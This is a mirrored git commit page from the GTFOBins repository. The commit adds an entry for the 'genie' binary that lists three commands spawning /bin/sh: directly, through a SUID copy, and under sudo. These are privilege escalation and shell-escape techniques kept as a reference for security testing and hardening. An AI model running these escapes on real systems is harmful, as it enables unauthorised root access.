mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add genie (no need "-p" flag to preserve suid)
This commit is contained in:
parent
58bca80e6c
commit
1bf5418f14
9
_gtfobins/genie.md
Normal file
9
_gtfobins/genie.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: genie -c '/bin/sh'
|
||||||
|
suid:
|
||||||
|
- code: ./genie -c '/bin/sh'
|
||||||
|
sudo:
|
||||||
|
- code: sudo genie -c '/bin/sh'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user